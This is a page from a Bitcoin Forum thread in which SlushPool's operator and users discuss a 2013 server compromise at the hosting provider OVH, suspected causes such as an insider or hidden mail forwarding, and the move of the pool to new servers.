Bitcoin Forum
September 26, 2016, 03:37:35 PM *
News: Due to DDoS attacks, there may be periodic downtime.
 
   Home   Help Search Donate Login Register  
Poll
Question: What type of pool payouts do you prefer?
Bitcoins - 3151 (80.4%)
Bank transfer / USD - 407 (10.4%)
Gold/silver coins and bars - 359 (9.2%)
Total Voters: 3915

Pages: « 1 ... 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 [333] 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 ... 1104 »
  Print  
Author Topic: [40+ PH] SlushPool (slushpool.com); World's First Mining Pool  (Read 3853847 times)
paraipan
Legendary
*
Offline Offline

Activity: 924


Firstbits: 1pirata


View Profile WWW
April 23, 2013, 11:38:50 PM
 #6641

Damn!! To me it sounds like an override of OVH password manager.... I hope you find out how they did. And I'm impressed by your respone-time on this hack.

And you sound like the hacker if you ask me...  Roll Eyes



Hope is all well Slush!

BTCitcoin: An Idea Worth Saving - Q&A with bitcoins on rugatu.com - Check my rep
1474904255
Hero Member
*
Offline Offline

Posts: 1474904255

View Profile Personal Message (Offline)

Ignore
1474904255
Reply with quote  #2

1474904255
Report to moderator
1474904255
Hero Member
*
Offline Offline

Posts: 1474904255

View Profile Personal Message (Offline)

Ignore
1474904255
Reply with quote  #2

1474904255
Report to moderator
1474904255
Hero Member
*
Offline Offline

Posts: 1474904255

View Profile Personal Message (Offline)

Ignore
1474904255
Reply with quote  #2

1474904255
Report to moderator
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1474904255
Hero Member
*
Offline Offline

Posts: 1474904255

View Profile Personal Message (Offline)

Ignore
1474904255
Reply with quote  #2

1474904255
Report to moderator
1474904255
Hero Member
*
Offline Offline

Posts: 1474904255

View Profile Personal Message (Offline)

Ignore
1474904255
Reply with quote  #2

1474904255
Report to moderator
1474904255
Hero Member
*
Offline Offline

Posts: 1474904255

View Profile Personal Message (Offline)

Ignore
1474904255
Reply with quote  #2

1474904255
Report to moderator
Trance104
Full Member
***
Offline Offline

Activity: 199


View Profile WWW
April 23, 2013, 11:40:14 PM
 #6642

I'm not able to mine currently.. Even though the site says I can. :-(

Can't stop the Trance! Dance!! DANCE!!!
www.youtube.com/pixelfixgaming
ZephramC
Sr. Member
****
Offline Offline

Activity: 475



View Profile
April 23, 2013, 11:44:01 PM
 #6643

Very impressive response! I hope things will settle soon. OVH has probably some explaining to do.
PuertoLibre
Legendary
*
Offline Offline

Activity: 1064


Master BFL Shill


View Profile
April 23, 2013, 11:44:38 PM
 #6644

So none of our earned bitcoins will be lost?

Ack.
It is an old hack that might be worth checking in your mail options. You might want to consider checking your inbox for any Forwarders. There is a way in most email systems for people to forward mail received in an account to another destination. The original mail still remains at the account but duplicates are normally forwarded to a second destination. The forwarding process is usually not obvious until you inspect your settings carefully.

This kind of hack means that you only need to compromise the account once, as once the forwarding is set, the account continues to transparently duplicate and forward the new mail to a second destination. Does not matter if you regain control of the account. It also does not require a person to check the content of the inbox as they get a copy at their forwarded address (so the original inbox remains untouched).

You should also contact the folks at your various providers to let them know that you want a stricter security check on each of your accounts. It will require more checks before you can do anything on the phone but it will preempt (or make very difficult) any forms of social engineering to gain access to your account.
camaro69327
Jr. Member
*
Offline Offline

Activity: 59



View Profile
April 23, 2013, 11:56:04 PM
 #6645

why they will hack slush pool especially???

I think because this was, similarly to Linode issue, an inside job. I don't have any indices that other bitcoin-related servers at OVH has been hacked as well (yet), but the scenario how all this happen indicates that somebody has been able to get password recovery email somehow. And what's the salary of administrator of OVH mailing server?

Wow...Is it time to get Authorities involved? OR have you already ?

...As always Great job and way to stay on top of things.

BTC : 1CcWoADqDtn5R1uL2TmTFw8CFtvLCqeW2j
TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:00:55 AM
 #6646

Stratum is back, great job!

Cheers,
   T
dellnull
Jr. Member
*
Offline Offline

Activity: 30


View Profile
April 24, 2013, 12:05:00 AM
 #6647

Damn!! To me it sounds like an override of OVH password manager.... I hope you find out how they did. And I'm impressed by your respone-time on this hack.

And you sound like the hacker if you ask me...  Roll Eyes



Hope is all well Slush!

I'm taking that as a compliment, but I can asure you that I don't bite the one who feed me.
phazedoubt
Newbie
*
Offline Offline

Activity: 18


People are my business


View Profile
April 24, 2013, 12:05:05 AM
 #6648

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.  More likely though, is the human element, an administrator paid to set things up.  Systems are usually surprisingly secure.  Almost every successful attack i see involves phishing or an inside job.  Just as an fyi though, nmap is a powerful tool, and anyone can intercept and reconstruct any email that is sent over the internet if it is not pgp encrypted.  i've done this for more than one client to prove the point.

It ALL comes back around...
laughingbear
Deflationary champion
Hero Member
*****
Offline Offline

Activity: 631


www.cryptobetfair.com


View Profile WWW
April 24, 2013, 12:05:24 AM
 #6649

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this
slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:07:29 AM
 #6650

I set up Stratum mining to not waste hashrate on the pool. However I didn't fix the hole because I think that the hole is OVH itself, so it's clearly possible that attackers shut down the pool again. I'll migrate out of OVH ASAP.

slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:08:43 AM
 #6651

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:10:36 AM
 #6652

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this

Can you please shed some light on this comment?
laughingbear
Deflationary champion
Hero Member
*****
Offline Offline

Activity: 631


www.cryptobetfair.com


View Profile WWW
April 24, 2013, 12:13:46 AM
 #6653

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this

Can you please shed some light on this comment?

I doubt it
gbx
Full Member
***
Offline Offline

Activity: 219


View Profile
April 24, 2013, 12:16:56 AM
 #6654

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

Interesting analysis.  Is it possible that the algo for the OTP is "known" ?  So the attacker would simply have to know what the next OTP password is once it's been submitted?
slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:18:13 AM
 #6655

Pool just found new block. Because database isn't running and shares are not stored, I'll spread blocks mined during database outage to miners who'll continue mining on the pool since the database will be up again.

TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:19:27 AM
 #6656

Stratum is back, great job!

Cheers,
   T

Way to never read anything before making your post... keep living the dream.  I know you will never read this

Can you please shed some light on this comment?

I doubt it

If I agreed with you, we both would be wrong. Never mind, no offence taken on my side whatsoever.
TiborB
Member
**
Offline Offline

Activity: 83


View Profile
April 24, 2013, 12:21:48 AM
 #6657

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

Interesting analysis.  Is it possible that the algo for the OTP is "known" ?  So the attacker would simply have to know what the next OTP password is once it's been submitted?

I'd guess he is using a vasco or rsa token with appropriate key size...
Lucko
Hero Member
*****
Offline Offline

Activity: 714



View Profile
April 24, 2013, 12:26:26 AM
 #6658

Pool just found new block. Because database isn't running and shares are not stored, I'll spread blocks mined during database outage to miners who'll continue mining on the pool since the database will be up again.

We are mining again? You told us tomorrow... Well I guess today morning but because I read tomorrow I removed your pool from config because I thought the stratum might come up hacked... I'm adding them again but for the last block you might use data that you have... It was a long one and I would hate to be lousing everything because of that...
slush
Legendary
*
Offline Offline

Activity: 1358



View Profile WWW
April 24, 2013, 12:27:58 AM
 #6659

For now it is mining on OVH machine, but now I'm migrating DNS to EC2 machines, which are trusted.

phazedoubt
Newbie
*
Offline Offline

Activity: 18


People are my business


View Profile
April 24, 2013, 12:29:17 AM
 #6660

Also, just as an FYI, i do network security in a completely different sector, but the attacks are usually the same.  The "sneak forwarding" is a common targeted attack.

I cross-checked my mailbox setup and no forwarding is configured here. For now I fully blame OVH for this issue.

Interesting analysis.  Is it possible that the algo for the OTP is "known" ?  So the attacker would simply have to know what the next OTP password is once it's been submitted?

I'd guess he is using a vasco or rsa token with appropriate key size...

Nothing so elaborate.  You'd be amazed at the power that an administrator can wield.  Your server security is only as strong as those that have physical access to them honoring their word.  Occam's razor applies greatly when it comes to hacking.

It ALL comes back around...
Pages: « 1 ... 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 [333] 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 ... 1104 »
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!